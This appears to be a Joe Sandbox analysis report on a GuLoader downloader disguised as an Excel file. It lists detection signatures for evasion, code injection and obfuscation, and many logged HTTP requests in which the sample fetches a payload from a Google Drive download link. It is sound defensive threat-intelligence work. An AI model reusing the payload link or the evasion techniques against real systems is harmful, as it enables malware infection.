Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
09-FD-94.03.60.175.07.xlsx.exe

Overview

General Information

Sample name:09-FD-94.03.60.175.07.xlsx.exe
Analysis ID:1576274
MD5:321a9608e5bf03bf63f4574d0df1a380
SHA1:71c523fc14b83e0c8d5eac9bcc61c9487c1f2dfd
SHA256:c113d227b647a1a61b1f9f6c5350a25a43acc26960ef9d9b1a3c5e80e68d75f0
Tags:exeuser-Racco42
Infos:

Detection

GuLoader
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Sigma detected: Suspicious Double Extension File Execution
Yara detected GuLoader
AI detected suspicious sample
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
SourceRuleDescriptionAuthorStrings
00000000.00000002.2290371684.0000000007D83000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000002.00000002.4016458454.0000000004A43000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

      System Summary

      barindex
      Source: Process startedAuthor: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe", CommandLine: "C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe, NewProcessName: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe, OriginalFileName: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe", ProcessId: 964, ProcessName: 09-FD-94.03.60.175.07.xlsx.exe
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-16T18:05:19.641089+010028032702Potentially Bad Traffic192.168.2.649756172.217.19.174443TCP

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: 09-FD-94.03.60.175.07.xlsx.exeReversingLabs: Detection: 55%
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
      Source: 09-FD-94.03.60.175.07.xlsx.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.6:49756 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.6:49764 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.6:49806 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.6:49888 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.6:49922 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.6:49956 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.6:49993 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.6:50027 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.6:50029 version: TLS 1.2
      Source: 09-FD-94.03.60.175.07.xlsx.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeCode function: 0_2_004057D0 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,0_2_004057D0
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeCode function: 0_2_0040628B FindFirstFileW,FindClose,0_2_0040628B
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeCode function: 0_2_00402770 FindFirstFileW,0_2_00402770
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeCode function: 2_2_00402770 FindFirstFileW,2_2_00402770
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeCode function: 2_2_004057D0 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,2_2_004057D0
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeCode function: 2_2_0040628B FindFirstFileW,FindClose,2_2_0040628B
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:49756 -> 172.217.19.174:443
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
      Source: global trafficHTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
      Source: global trafficHTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
      Source: global trafficHTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
      Source: global trafficHTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
      Source: global trafficHTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
      Source: global trafficHTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
      Source: global trafficHTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
      Source: global trafficHTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
      Source: global trafficHTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
      Source: global trafficHTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
      Source: global trafficHTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
      Source: global trafficHTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
      Source: global trafficHTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
      Source: global trafficHTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
      Source: global trafficHTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
      Source: global trafficHTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
